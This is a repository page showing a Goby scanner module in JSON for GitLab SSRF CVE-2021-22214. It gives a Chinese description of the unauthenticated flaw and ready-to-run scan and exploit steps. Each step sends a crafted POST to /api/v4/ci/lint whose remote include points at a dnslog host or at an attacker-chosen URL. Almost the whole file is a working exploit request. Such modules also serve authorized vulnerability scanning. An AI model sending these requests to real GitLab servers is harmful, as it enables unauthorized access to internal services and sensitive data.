qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/GitLab_SSRF_CVE_2021_22214....

104 lines
4.4 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "GitLab SSRF CVE-2021-22214",
"Level": "3",
"Tags": [],
"GobyQuery": "app=\"GitLab\"",
"Description": "GitLab存在前台未授权SSRF漏洞未授权的攻击者也可以利用该漏洞执行SSRF攻击CVE-2021-22214。该漏洞源于对用户提供数据的验证不足远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。",
"Product": "Gitlab > 10.5",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"HasExp": true,
"ExpParams": [
{
"name": "URL",
"type": "input",
"value": "test.dnslog.cn",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/v4/ci/lint",
"follow_redirect": false,
"header": {
"Content-Type": "application/json",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Content-Length": ""
},
"data_type": "text",
"data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://test.dnslog.cn/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test.dnslog.cn",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/v4/ci/lint",
"follow_redirect": false,
"header": {
"Content-Type": "application/json",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Content-Length": ""
},
"data_type": "text",
"data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://{{{URL}}}/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test.dnslog.cn",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-07-01 20:34:22",
"GobyVersion": "1.8.268"
}
Reference in New Issue View Git Blame Copy Permalink